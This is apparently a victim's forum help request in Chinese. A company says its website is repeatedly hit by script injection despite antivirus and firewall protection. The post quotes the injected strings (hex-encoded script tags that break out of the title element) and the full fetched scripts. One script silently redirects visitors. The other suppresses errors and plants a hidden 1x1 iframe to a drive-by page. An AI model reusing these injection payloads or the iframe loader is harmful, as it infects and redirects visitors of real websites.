www.xjqpc.com我们公司用的是瑞星网络版,服务器也装了瑞星防火墙,但是网站受到攻击,被反复注入
“ "></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!" ”
“ "></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr""></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr" "../UploadFile/Product/4b062f0c-c444-46b6-bb65-0151898a9d79.jpg""></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr" """></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr" ”
举报,希望高手帮助!
代码如下:1.js
<html>
<head>
<link rel="stylesheet" type="text/css" href="
http://202.106.195.23:6688/aicss_test242.css" />
</head>
<script>
s=String(window.location.href);
mylocal=s.substring(7,s.indexOf('/',7));
t = "
http://www.bbn.com.cn/search/tishi/index.htm?MT=" + mylocal;
document.location.href = t;
</script>
<body></body>
</html>
代码:s.js
document.writeln("<base onmouseover=\"window.status=\'完毕 \';return true\">");
document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln("<!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln("<\/SCRIPT>");
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie101a2="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie101a2=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"
http://mm.mimi8.biz/cao/am7.htm?888\" width=1 height=1><\/IFRAME>");
document.write("<div style=\"display:none\">");
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/642888\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/642888\/ystat.gif\"\/><\/a><\/noscript>");
}
}Get();
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)